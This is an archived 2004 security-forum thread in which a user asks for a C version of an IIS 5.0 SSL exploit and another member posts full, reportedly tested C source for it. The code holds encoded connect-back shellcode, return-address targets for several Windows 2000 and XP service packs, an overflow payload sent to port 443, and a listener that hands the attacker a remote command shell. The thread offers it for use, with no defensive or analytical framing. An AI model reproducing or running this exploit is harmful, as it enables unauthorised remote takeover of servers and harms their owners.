hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Tool
May 25 2004, 04:29 PM
hi,
has anyone converted this exploit > here to C ?

Cuz i need a version in C,

thank you
mortello
May 25 2004, 05:30 PM
damn, just search the damn board, its been release by Johnny D. I believe and its on this board I'm sure of that

so just look for it
Tool
May 25 2004, 06:00 PM
I'm not talking about the thciislame exploit( that only works on iis 5.0 -> win2k)

i need one that works on iis 5.0 and 5.1 and coded in C

thank you
jjoao
May 25 2004, 06:43 PM
i used that exploit in metasploit framework,had to add the module to the console of that wonderful piece of work.
www.metasploit.com-framework-2.0
jimmy
May 26 2004, 10:51 AM
I made one
Although you won't find many vulnerable XP's cause unlike 2k's on xp there is no standard service using SLL
NOTE: important:
1. Compile with lcc-win32 cause won't compile on visual
2. Don't forget to add ws2_32.lib in the configuration of the lcc project

CODE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>


#pragma comment(lib, "ws2_32.lib")

#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

#define ACCEPT_TIMEOUT 5


char sslshit[] = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00";

char shellcode[] =
"\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53"
"\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30"
"\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55"
"\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65"
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57"
"\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88"
"\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff"
"\x55\xf0\x6a\xff\xff\x55\xe4";

int max_num = 6;


struct targets
  { char *name;
    unsigned int trg;

  }

arch[]=
{

{"Windows 2000 SP3/SP4",0x6741a7c6
},
{"Windows 2000 SP4 German/English",0x6741a1cd
},
{ "Windows 2000 SP3 German/English",0x67419e1d
},
{ "Windows 2000 SP2 German/English",0x6741a426
},
{ "Windows 2000 SP1 German/English",0x6741a199
},
{ "Windows XP SP0 German/English",0x0ffb7de9
},
{ "Windows XP SP1 German/English",0x0ffb832f
}

};



void usage();
void shell(int sock);

int main(int argc, char *argv[])
  {


  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
  unsigned char *badbuf,*p;


  unsigned long XOR = 0xffffffff;
  unsigned short cbport;
  unsigned long cbip;

  struct sockaddr_in mytcp;
  struct hostent * hp;

  struct timeval tv;
  fd_set fds;

  WSADATA wsaData;

  printf("\nIIS 5.0 SSL remote root exploit\n");
  printf("V2.0 : Fixed the XP targets\n");
  printf("by JGS @ TensionTeam\n");


  if(argc<5 || argc>5)
  usage();


  unsigned short x=(atoi(argv[4]));
  unsigned long offset = arch[x].trg;




badbuf = malloc(327);
memset(badbuf,0,327);

printf("\n[*] building buffer\n");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper);
strcat(p,greetings_to_microsoft);

offset^=XOR;
strncat(p,(unsigned char *)&offset,4);

cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

strcat(p,shellcode);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
 {
 printf("WSAStartup failed !\n");
 exit(-1);
 }

 hp = gethostbyname(argv[1]);

if (!hp)
 {
 addr = inet_addr(argv[1]);
 }

if ((!hp) && (addr == INADDR_NONE) )
 {
 printf("Unable to resolve %s\n",argv[1]);
 exit(-1);
 }

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
 {
 printf("socket() error...\n");
 exit(-1);
 }


if (hp != NULL)
 memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
 mytcp.sin_addr.s_addr = addr;

if (hp)
 mytcp.sin_family = hp->h_addrtype;
else
 mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(443);
printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));

if(rc==0)
  {
  send(sock,badbuf,326,0);
  printf("[*] exploit send\n");
  printf("[*] using Offset: 0x%.8x  OS: %s\n",arch[x].trg,arch[x].name);
  Sleep(500);

  mytcp.sin_addr.s_addr = 0;
  mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

  sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

  rc=bind(sock2,(struct sockaddr *)&mytcp,16);

    if(rc!=0)
      {
      printf("bind error() %d\n",WSAGetLastError());
      exit(-1);
      }

    rc=listen(sock2,1);

    if(rc!=0)
      {
      printf("listen error()\n");
      exit(-1);
      }

    printf("[*] waiting for shell\n");


 tv.tv_sec = ACCEPT_TIMEOUT;
 tv.tv_usec = 0;
 FD_ZERO(&fds);
 FD_SET(sock2,&fds);



    if((select(1,&fds,0,0,&tv))>0)
    {
    sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
    printf("[*] Exploit successful ! Have fun !\n");
    printf("[*] --------------------------------------------------------------------\n\n");
    shell(sock3);

    }
    else
    {
    printf("[*] exploit appears to have failed!\n");
    exit(-1);
    }


  }


  else
  {
  printf("\nCan't connect to ssl port 443!\n");
  exit(-1);

  }

  shutdown(sock,1);
  closesocket(sock);
  shutdown(sock,2);
  closesocket(sock2);
  shutdown(sock,3);
  closesocket(sock3);

  free(badbuf);

  exit(-1);


  return 0;
}

void usage()
  {
  unsigned int a;
  int i;


  printf("\nUsage: <victim-host> <connectback-ip> <connectback port> <target>\n");
  printf("e.g. : IISSSL 127.00.1 192.168.1.3 113 0\n");
  printf("\nTargets:\n");

  for(i=0;i<=max_num;i++)
  {
  printf("%d - %s\n",i,arch[i].name);
  }




  exit(0);
}

void shell(int sock)
{
 int l;
 char buf[1024];
 struct timeval time;
 unsigned long ul[2];

 time.tv_sec = 1;
 time.tv_usec = 0;

 while (1)
   {
   ul[0] = 1;
   ul[1] = sock;

   l = select (0, (fd_set *)&ul, NULL, NULL, &time);

      if(l == 1)
        {
        l = recv (sock, buf, sizeof (buf), 0);

         if (l <= 0)
           {
           printf ("bye bye...\n");
           return;
           }

        l = write (1, buf, l);

         if (l <= 0)
           {
           printf ("bye bye...\n");
           return;
           }

        }

      else
        {
        l = read (0, buf, sizeof (buf));
          if (l <= 0)
            {
            printf("bye bye...\n");
            return;
            }

      l = send(sock, buf, l, 0);
        if (l <= 0)
         {
          printf("bye bye...\n");
          return;
             }

    }


 }
}
Tool
May 26 2004, 12:46 PM
thank you very much for this, i appreciate this smile.gif
jimmy
May 26 2004, 02:42 PM
hehe
I made it shortly after the other releases and tested it and it also actually works:)
but hole is closed by now I guess
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.